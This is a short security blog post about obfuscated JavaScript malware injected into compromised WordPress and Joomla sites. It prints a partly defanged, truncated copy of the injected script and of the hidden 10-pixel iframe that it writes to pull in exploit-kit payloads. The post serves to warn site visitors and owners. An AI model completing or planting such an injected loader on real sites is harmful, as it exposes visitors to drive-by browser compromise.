The Latest in IT Security

Malware Infections from rebotstat dot com


We are starting to share some of our research and view of web-based malware online: The #1 infection we are seeing in the last few days is caused by a heavily encoded piece of javascript malware:

<!- o -><script>b=new function()
{return 2;};if(!+b)String.prototype.vqwfbeweb=’h’+’arC’;for(i 
in $=’b4h3tbn’)
if(i==’vqwfbeweb’)m=$[i];try{new Object().wehweh();}catch(q)
{s=String[“fr”+”omC”+m+”od”+’e’];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd=’e’;if({}.asd===’e’)a=document[“c”+”r”+”e”+”a”+”
for(i=0;i<n.length;i++)ss +=s(e val(“n”+”[i”+”]”));
if(!+b) e val(ss);</script><!- c ->

We are seeing this code added to the bottom of many compromised sites (from WordPress to Joomla, and many others). What this code does is to create an iFrame element to the site

document.write(“<i frame src=’’ width=’10′ height=’10′

From there, more malware is loaded and the browser visiting the site gets compromised (or at least that’s the goal of the attackers).

So if you are visiting a site and your anti virus is complaining about “Black Hole Exploit kit” or similar names, it could be compromised with this malware. You can scan a site here to verify: This is how our scanner classifies this malware:

*Note that we are seeing multiple variations of this type of malware (and different domains), but this latest is the most common now.

Leave a reply


FRIDAY, MARCH 24, 2023

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...



Latest Comments